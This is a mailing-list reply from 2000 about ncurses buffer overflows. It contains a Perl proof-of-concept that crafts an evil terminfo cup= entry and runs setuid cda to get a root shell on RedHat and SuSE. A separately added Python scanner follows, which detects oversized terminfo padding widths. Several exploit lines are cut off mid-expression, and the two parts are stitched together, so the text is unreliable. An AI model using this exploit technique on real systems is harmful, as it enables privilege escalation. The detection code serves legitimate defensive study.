Re: ncurses buffer overflows (fwd)

From: Jouko Pynnönen
Subject: Re: ncurses buffer overflows (fwd)
Date: Mon, 2 Oct 2000 19:00:52 +0300 (EEST)

On Mon, 2 Oct 2000, Thomas E. Dickey wrote:

> I'd like to see the exploit: there are too many perhaps/maybes in this

This is a demonstration script I sent to linux people on
address@hidden; it works straight on rh-6.2 and SuSE-6.4, other platforms
may need fiddling with the number values...


# Proof of concept exploit for ncurses and cda,
# gives root on SuSE and RedHat.
# (c) 2000 Jouko Pynnonen
# This was written for vendors for informational purposes -
# do not distribute.
# Type stty sane <ctrl-j> when the shell starts to get keyboard echo back.

if (!$offset) { $offset=0; }
if (!$buflen) { $buflen=500; }
if (!$align) { $align=0; }

# create the evil terminfo file


open(A,">infofile") || die("Can't write infofile");
print A "
        am, bce, eo, mir, msgr, xenl, xon,
        cols#80, it#8, lines#25,";
$prepad='x' x $align;
$postpad='y' x (4-$align);
print A "cup=$prepad%0".$buflen."d".($addr x 30).($bddr x 
close A;

# compile it
system("tic infofile -o ~/.terminfo 2>/dev/null");

# stabilize env
foreach $e (keys %ENV) {
        delete $ENV{$e} unless $e eq 'HOME';
}
$ENV{"SHELLCODE"}=("\x90" x 200).

if (! -f "/tmp/sh") {
        if (-f "/bin/ash") { system("cp -f /bin/ash /tmp/sh"); }
                else { system("cp -f /bin/sh /tmp"); }
}

system("mkdir -p tmp/config;touch tmp/config/common.cfg tmp/config/null");
$st=system("cda -dev /dev/null visual");
if ($st != 0) { print "exit status: $st\n"; }
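The script above relies on one thing: a `cup=` capability whose `%0<N>d` conversion has a width (`$buflen`, 500 here) far larger than the fixed buffer ncurses' parameter-expansion routine (tparm) writes the padded result into, so that a user-controlled `~/.terminfo` entry drives the overflow. The following Python is an added defensive check, not part of the original post or of ncurses: it parses terminfo source text of the kind `tic` compiles and flags any string capability whose conversion width or total length is implausible for a terminal description. The sample source, the `safe`/`evil` entry names and the thresholds `MAX_WIDTH`/`MAX_CAP_LEN` are constructed for the example; they are not ncurses constants.

```python
"""Flag terminfo source entries whose string capabilities carry oversized
tparm() padding widths. Added example, not part of the original post."""
import re

# Constructed sample (not from the original post). The "evil" entry copies the
# shape of the cup= capability the post describes: a %0<N>d conversion whose
# width runs far past any screen dimension.
SAMPLE_TERMINFO_SOURCE = """\
safe|constructed well-formed entry,
        am, xenl,
        cols#80, lines#25,
        cup=\\E[%i%p1%d;%p2%dH,
evil|constructed entry with an oversized padding width,
        am, bce, eo, mir, msgr, xenl, xon,
        cols#80, it#8, lines#25,
        cup=xx%0500dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,
"""

# tparm conversion: %[:flags][width][.precision](d|o|x|X|s). The width group
# is the value the overflow abuses.
_CONV_RE = re.compile(r'%[:\-+# 0]*(\d+)(?:\.\d+)?[doxXs]')

# Thresholds are assumptions chosen for this example, not ncurses constants.
MAX_WIDTH = 256     # no legitimate cursor-addressing width needs more
MAX_CAP_LEN = 1024  # string capabilities are normally a few dozen bytes


def split_entries(src):
    """Yield (name, [capability strings]) for each entry in terminfo source.
    Entries start at column 0, continuation lines are indented, and a comma
    separates capabilities unless it is escaped as '\\,'."""
    blocks, cur = [], []
    for line in src.splitlines():
        if not line.strip() or line.lstrip().startswith('#'):
            continue
        if not line[0].isspace():
            if cur:
                blocks.append(cur)
            cur = [line.strip()]
        else:
            cur.append(line.strip())
    if cur:
        blocks.append(cur)
    for block in blocks:
        fields = [f.strip() for f in re.split(r'(?<!\\),', ' '.join(block))]
        name = fields[0].split('|', 1)[0]
        yield name, [f for f in fields[1:] if f]


def find_suspicious(src, max_width=MAX_WIDTH, max_cap_len=MAX_CAP_LEN):
    """Return one finding per string capability that either declares a
    conversion width above max_width or is longer than max_cap_len."""
    findings = []
    for name, caps in split_entries(src):
        for cap in caps:
            if '=' not in cap:
                continue  # boolean (am) or numeric (cols#80) capability
            capname, value = cap.split('=', 1)
            widths = [int(w) for w in _CONV_RE.findall(value)]
            worst = max(widths, default=0)
            if worst > max_width or len(value) > max_cap_len:
                findings.append({'entry': name, 'cap': capname,
                                 'width': worst, 'length': len(value)})
    return findings


if __name__ == '__main__':
    for f in find_suspicious(SAMPLE_TERMINFO_SOURCE):
        print(f"{f['entry']}: {f['cap']}= has width {f['width']}, "
              f"length {f['length']}")
```

Run against the sample it reports only the `evil` entry's `cup=` with width 500. In practice the same scan can be pointed at the source form of any user-writable terminfo tree (`infocmp` can decompile a compiled entry back to this format) before a privileged program is allowed to honour it; the real fix, as later ncurses releases did, is to bound the expansion rather than trust the capability string.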

